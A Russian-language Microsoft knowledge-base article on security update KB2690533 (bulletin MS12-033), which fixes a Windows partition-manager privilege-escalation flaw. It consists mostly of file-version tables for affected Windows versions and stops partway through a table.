Повышение привилегий windows server 2008 r2

Описанное в данной статье обновление устраняет уязвимости в Microsoft Windows, делающие возможным повышение привилегий злоумышленником, который входит в систему на компьютере пользователя и запускает специально созданное приложение.

ВВЕДЕНИЕ

Корпорация Майкрософт выпустила бюллетень по безопасности MS12-033. Просмотреть его целиком можно на одном из указанных ниже веб-сайтов корпорации Майкрософт.

  • Версия для пользователей домашних компьютеров:

    http://www.microsoft.com/ru-ru/security/pc-security/bulletins/201205.aspxПропустить подробные сведения: Загрузите обновления на домашний компьютер или ноутбук с веб-сайта Центра обновления Майкрософт:

    http://www.update.microsoft.com/microsoftupdate/

  • Версия для ИТ-специалистов:

    http://technet.microsoft.com/ru-ru/security/bulletin/ms12-033

Справка и поддержка по данному обновлению для системы безопасности

СВЕДЕНИЯ О ФАЙЛАХ

Английская версия (США) данного обновления программного обеспечения содержит файлы с атрибутами, указанными в приведенных ниже таблицах. Дата и время для файлов указаны в формате UTC. Дата и время для этих файлов на локальном компьютере отображаются по местному времени с учетом часового пояса и перехода на летнее время. Кроме того, при выполнении определенных операций с файлами даты и время могут изменяться.

Сведения о файлах для Windows Vista и Windows Server 2008

  • Файлы, относящиеся к определенному продукту, этапу разработки (SPn) и направлению поддержки (LDR, GDR), можно определить по номерам версий, указанным в приведенной ниже таблице.

    Версия

    Продукт

    Этап разработки

    Направление поддержки

    6.0.6002.18xxx

    Windows Vista с пакетом обновления 2 (SP2) и Windows Server 2008 с пакетом обновления 2 (SP2)

    SP2

    GDR

    6.0.6002.22xxx

    Windows Vista с пакетом обновления 2 (SP2) и Windows Server 2008 с пакетом обновления 2 (SP2)

    SP2

    LDR

  • В выпусках обновлений для общего распространения содержатся только общедоступные исправления, которые предназначены для устранения часто встречающихся важных проблем. В выпусках обновлений LDR помимо общедоступных содержатся дополнительные исправления.

  • Файлы с расширениями MANIFEST и MUM, устанавливаемые для каждой среды, указаны отдельно. Эти файлы, а также связанные CAT-файлы каталога безопасности критически важны для отслеживания состояния обновляемого компонента. Файлы каталога безопасности (атрибуты не указаны) подписаны цифровой подписью Майкрософт.

Для всех поддерживаемых 32-разрядных (x86) версий Windows Vista и Windows Server 2008

File name

File version

File size

Date

Time

Platform

Partmgr.sys

6.0.6002.18600

53,120

20-Mar-2012

23:28

x86

Partmgr.sys

6.0.6002.22821

52,608

20-Mar-2012

23:28

x86

Для всех поддерживаемых 64-разрядных (x64) версий Windows Vista и Windows Server 2008

File name

File version

File size

Date

Time

Platform

Partmgr.sys

6.0.6002.18600

72,576

20-Mar-2012

23:34

x64

Partmgr.sys

6.0.6002.22821

72,064

20-Mar-2012

23:34

x64

Для всех поддерживаемых версий Windows Server 2008 с архитектурой IA-64

File name

File version

File size

Date

Time

Platform

Partmgr.sys

6.0.6002.18600

154,496

20-Mar-2012

23:25

IA-64

Partmgr.sys

6.0.6002.22821

153,984

20-Mar-2012

23:25

IA-64

Сведения о дополнительных файлах для Windows Vista и Windows Server 2008

Дополнительные файлы для всех поддерживаемых 32-разрядных (x86) версий Windows Vista и Windows Server 2008

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,395

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

3,122

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,237

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,960

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_3_for_kb2690533_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,237

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_3_for_kb2690533~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,960

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_2_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,681

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_2~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,708

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,426

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,446

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,677

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,704

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,418

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,438

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,681

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,708

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,426

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,446

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,020

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

X86_5aa249203ae40de851677748a5b55f8e_31bf3856ad364e35_6.0.6002.18600_none_411e49d5bf22b694.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

X86_945529c71c9b60a4e1ad073fce6781ad_31bf3856ad364e35_6.0.6002.22821_none_12a803965d8e7a36.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.18600_none_e3829689b795cc16.manifest

File version

Not Applicable

File size

9,973

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.22821_none_e3f795acd0c2ba40.manifest

File version

Not Applicable

File size

9,973

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

Дополнительные файлы для всех поддерживаемых 64-разрядных (x64) версий Windows Vista и Windows Server 2008

File name

Amd64_1801a0fd54691f4b17650d4c1e89adad_31bf3856ad364e35_6.0.6002.18600_none_b7254ec540e06429.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Amd64_82d5dd756430ec4da6f43011ad56818f_31bf3856ad364e35_6.0.6002.22821_none_0c8aac913079f7b1.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.18600_none_3fa1320d6ff33d4c.manifest

File version

Not Applicable

File size

9,983

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.22821_none_4016313089202b76.manifest

File version

Not Applicable

File size

9,983

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,413

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

3,144

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,253

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,980

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_3_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,253

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_3_for_kb2690533~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,980

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_2_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,693

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_2~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,720

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_client~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,454

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,689

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,716

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,426

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,446

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,693

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,720

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,454

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,044

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

Дополнительные файлы для всех поддерживаемых версий Windows Server 2008 для платформы IA-64

File name

Ia64_0e5c26fb3337e3c46ec179de8c70fc52_31bf3856ad364e35_6.0.6002.22821_none_e0eccd5bbd601b00.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Ia64_11c612b3b7399dde4aae62f0404c5f39_31bf3856ad364e35_6.0.6002.18600_none_ae4f87c070f69dcb.manifest

File version

Not Applicable

File size

706

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.18600_none_e3843a7fb793d512.manifest

File version

Not Applicable

File size

9,978

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Ia64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.0.6002.22821_none_e3f939a2d0c0c33c.manifest

File version

Not Applicable

File size

9,978

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,083

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,804

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,083

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,804

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,521

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_1~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,544

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,422

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,441

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,525

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_1~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,548

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,430

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Package_for_kb2690533_server~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,449

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

2,221

Date (UTC)

20-Mar-2012

Time (UTC)

23:38

Platform

Not Applicable

Сведения о файлах для систем Windows 7 и Windows Server 2008 R2

  • Файлы, относящиеся к определенному продукту, этапу разработки (RTM, SPn) или направлению поддержки (LDR, GDR), можно определить по номерам версий, указанным в приведенной ниже таблице.

    Версия

    Продукт

    Этап разработки

    Направление поддержки

    6.1.7600.16xxx

    Windows 7 и Windows Server 2008 R2

    RTM

    GDR

    6.1.7600.20xxx

    Windows 7 и Windows Server 2008 R2

    RTM

    LDR

    6.1.7601.17xxx

    Windows 7 и Windows Server 2008 R2

    SP1

    GDR

    6.1.7601.21xxx

    Windows 7 и Windows Server 2008 R2

    SP1

    LDR

  • В выпусках обновлений для общего распространения содержатся только общедоступные исправления, которые предназначены для устранения часто встречающихся важных проблем. В выпусках обновлений LDR помимо общедоступных содержатся дополнительные исправления.

  • Файлы с расширениями MANIFEST и MUM, устанавливаемые для каждой среды, указаны отдельно в разделе «Сведения о дополнительных файлах для систем Windows 7 и Windows Server 2008 R2». Эти файлы, а также связанные CAT-файлы каталога безопасности критически важны для отслеживания состояния обновляемого компонента. Файлы каталога безопасности (атрибуты не указаны) подписаны цифровой подписью Майкрософт.

Все поддерживаемые 32-разрядные (x86) версии Windows 7

File name

File version

File size

Date

Time

Platform

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

21:26

Not Applicable

Partmgr.sys

6.1.7600.16979

56,688

17-Mar-2012

07:20

x86

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

21:26

Not Applicable

Partmgr.sys

6.1.7600.21172

56,176

17-Mar-2012

07:25

x86

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

21:26

Not Applicable

Partmgr.sys

6.1.7601.17796

56,176

17-Mar-2012

07:27

x86

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

21:26

Not Applicable

Partmgr.sys

6.1.7601.21946

56,176

17-Mar-2012

07:05

x86

Для всех поддерживаемых 64-разрядных (x64) версий Windows 7 и Windows Server 2008 R2

File name

File version

File size

Date

Time

Platform

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:44

Not Applicable

Partmgr.sys

6.1.7600.16979

75,632

17-Mar-2012

07:55

x64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:44

Not Applicable

Partmgr.sys

6.1.7600.21172

75,120

17-Mar-2012

08:10

x64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:44

Not Applicable

Partmgr.sys

6.1.7601.17796

75,120

17-Mar-2012

07:58

x64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:44

Not Applicable

Partmgr.sys

6.1.7601.21946

75,120

17-Mar-2012

08:07

x64

Все поддерживаемые версии Windows Server 2008 R2 для систем на базе процессоров IA-64

File name

File version

File size

Date

Time

Platform

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:49

Not Applicable

Partmgr.sys

6.1.7600.16979

169,840

17-Mar-2012

06:48

IA-64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:49

Not Applicable

Partmgr.sys

6.1.7600.21172

169,328

17-Mar-2012

06:59

IA-64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:49

Not Applicable

Partmgr.sys

6.1.7601.17796

169,328

17-Mar-2012

06:58

IA-64

Partmgr.mof

Not Applicable

1,945

10-Jun-2009

20:49

Not Applicable

Partmgr.sys

6.1.7601.21946

169,328

17-Mar-2012

06:50

IA-64

Сведения о дополнительных файлах для Windows 7 и Windows Server 2008 R2

Дополнительные файлы для всех поддерживаемых 32-разрядных (x86) версий Windows 7

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,794

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,505

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,799

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,708

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_3_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,779

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_3_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,690

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_4_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,794

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_4_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,505

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_5_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,993

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_5_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,511

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_6_for_kb2690533_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,975

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_6_for_kb2690533~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,492

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,865

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

2,935

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1_bf~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,894

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_sp1~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,929

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

2,728

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

X86_27378f0f6855dc6d308c866352ae0c22_31bf3856ad364e35_6.1.7601.21946_none_f3e496cf7a357d79.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

X86_78bdc963bee2eaee097475949412d76d_31bf3856ad364e35_6.1.7600.16979_none_ffba7aaaa831a445.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

X86_b963f3248e1dc42c4944692ce63a5bde_31bf3856ad364e35_6.1.7600.21172_none_742704b1491432df.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

X86_c6c6d36262ef9b1d0e8cc8dcfa4aa0f7_31bf3856ad364e35_6.1.7601.17796_none_b1e6ebb1ed1a7b12.manifest

File version

Not Applicable

File size

704

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.16979_none_e18146271bb75e59.manifest

File version

Not Applicable

File size

8,984

Date (UTC)

17-Mar-2012

Time (UTC)

07:43

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.21172_none_e203b90e34db8004.manifest

File version

Not Applicable

File size

8,984

Date (UTC)

17-Mar-2012

Time (UTC)

07:45

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.17796_none_e34f027718f0b622.manifest

File version

Not Applicable

File size

8,984

Date (UTC)

17-Mar-2012

Time (UTC)

07:55

Platform

Not Applicable

File name

X86_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.21946_none_e40eb0c431e5c75e.manifest

File version

Not Applicable

File size

8,984

Date (UTC)

17-Mar-2012

Time (UTC)

07:32

Platform

Not Applicable

Дополнительные файлы для всех поддерживаемых 64-разрядных (x64) версий Windows 7 и Windows Server 2008 R2

File name

Amd64_2e1c611ee09882c7b8cc6cbc4010257b_31bf3856ad364e35_6.1.7600.21172_none_45a1a38bd918822b.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Amd64_6b6414a3a3f69d2dc5700af18aa16577_31bf3856ad364e35_6.1.7601.17796_none_2a6dacd16cc1f87d.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Amd64_c310af8aabb017d041913c774e767723_31bf3856ad364e35_6.1.7600.16979_none_dd6345005acabe55.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Amd64_ccf476eb1922cc7bfd5259d091b99e11_31bf3856ad364e35_6.1.7601.21946_none_cbb2883a26dfe837.manifest

File version

Not Applicable

File size

708

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.16979_none_3d9fe1aad414cf8f.manifest

File version

Not Applicable

File size

8,992

Date (UTC)

17-Mar-2012

Time (UTC)

08:40

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7600.21172_none_3e225491ed38f13a.manifest

File version

Not Applicable

File size

8,992

Date (UTC)

17-Mar-2012

Time (UTC)

08:46

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.17796_none_3f6d9dfad14e2758.manifest

File version

Not Applicable

File size

8,992

Date (UTC)

17-Mar-2012

Time (UTC)

08:44

Platform

Not Applicable

File name

Amd64_microsoft-windows-partitionmanager_31bf3856ad364e35_6.1.7601.21946_none_402d4c47ea433894.manifest

File version

Not Applicable

File size

8,992

Date (UTC)

17-Mar-2012

Time (UTC)

08:37

Platform

Not Applicable

File name

Package_1_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,804

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_1_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,519

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,027

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_2_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

3,146

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_3_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,789

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_3_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,706

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_4_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,804

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_4_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,519

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_5_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,419

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_5_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,747

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_6_for_kb2690533_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,987

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_6_for_kb2690533~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,506

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm_bf~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

3,103

Date (UTC)

20-Mar-2012

Time (UTC)

19:01

Platform

Not Applicable

File name

Package_for_kb2690533_rtm~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

3,177

Date (UTC)

